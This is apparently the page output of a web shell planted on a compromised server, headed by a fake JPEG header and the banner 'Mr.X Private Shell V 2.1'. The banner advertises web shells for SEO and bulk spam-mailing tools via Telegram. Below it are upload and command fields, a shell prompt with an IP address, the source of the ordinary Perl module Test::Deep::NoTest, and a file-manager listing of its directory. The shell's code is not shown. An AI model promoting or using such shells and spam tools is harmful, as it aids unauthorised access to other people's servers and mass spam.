����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
use strict;
use warnings;

# this is for people who don't want Test::Builder to be loaded but want to
# use eq_deeply. It's a bit hacky...

package Test::Deep::NoTest 1.205;
# ABSTRACT: Use Test::Deep outside of the testing framework

our $NoTest;

{
  local $NoTest = 1;
  require Test::Deep;
}

sub import {
  my $import = Test::Deep->can("import");
  # make the stack look like it should for use Test::Deep
  my $pkg = shift;
  unshift(@_, "Test::Deep");
  push @_, '_notest';
  goto &$import;
}

1;

#pod =head1 SYNOPSIS
#pod
#pod   use Test::Deep::NoTest;
#pod
#pod   if (eq_deeply($a, $b)) {
#pod     print "they were deeply equal\n";
#pod   }
#pod
#pod =head1 DESCRIPTION
#pod
#pod This exports all the same things as Test::Deep but it does not load
#pod Test::Builder so it can be used in ordinary non-test situations.

__END__

=pod

=encoding UTF-8

=head1 NAME

Test::Deep::NoTest - Use Test::Deep outside of the testing framework

=head1 VERSION

version 1.205

=head1 SYNOPSIS

  use Test::Deep::NoTest;

  if (eq_deeply($a, $b)) {
    print "they were deeply equal\n";
  }

=head1 DESCRIPTION

This exports all the same things as Test::Deep but it does not load
Test::Builder so it can be used in ordinary non-test situations.

=head1 PERL VERSION

This library should run on perls released even a long time ago.  It should
work on any version of perl released in the last five years.

Although it may work on older versions of perl, no guarantee is made that the
minimum required version will not be increased.  The version may be increased
for any reason, and there is no promise that patches will be accepted to
lower the minimum required perl.

=head1 AUTHORS

=over 4

=item *

Fergal Daly

=item *

Ricardo SIGNES <cpan@semiotic.systems>

=back

=head1 COPYRIGHT AND LICENSE

This software is copyright (c) 2003 by Fergal Daly.

This is free software; you can redistribute it and/or modify it under
the same terms as the Perl 5 programming language system itself.

=cut

Filemanager

Name Type Size Permission Actions
Cache Folder 0755
All.pm File 1.51 KB 0444
Any.pm File 1.71 KB 0444
Array.pm File 1.3 KB 0444
ArrayEach.pm File 1.34 KB 0444
ArrayElementsOnly.pm File 1.5 KB 0444
ArrayLength.pm File 1.2 KB 0444
ArrayLengthOnly.pm File 1.48 KB 0444
Blessed.pm File 1.38 KB 0444
Boolean.pm File 1.38 KB 0444
Cache.pm File 1.84 KB 0444
Class.pm File 1.18 KB 0444
Cmp.pm File 1.95 KB 0444
Code.pm File 1.52 KB 0444
Hash.pm File 2.22 KB 0444
HashEach.pm File 1.15 KB 0444
HashElements.pm File 2.09 KB 0444
HashKeys.pm File 1.82 KB 0444
HashKeysOnly.pm File 2.35 KB 0444
Ignore.pm File 1.01 KB 0444
Isa.pm File 1.35 KB 0444
ListMethods.pm File 1.12 KB 0444
MM.pm File 1.73 KB 0444
Methods.pm File 2.11 KB 0444
NoTest.pm File 1.94 KB 0444
None.pm File 1.68 KB 0444
Number.pm File 1.89 KB 0444
Obj.pm File 1.34 KB 0444
Ref.pm File 1.31 KB 0444
RefType.pm File 1.37 KB 0444
Regexp.pm File 2.21 KB 0444
RegexpMatches.pm File 1.48 KB 0444
RegexpOnly.pm File 1.34 KB 0444
RegexpRef.pm File 1.46 KB 0444
RegexpRefOnly.pm File 1.25 KB 0444
RegexpVersion.pm File 1.11 KB 0444
ScalarRef.pm File 1.26 KB 0444
ScalarRefOnly.pm File 1.21 KB 0444
Set.pm File 4.44 KB 0444
Shallow.pm File 1.42 KB 0444
Stack.pm File 1.88 KB 0444
String.pm File 1.19 KB 0444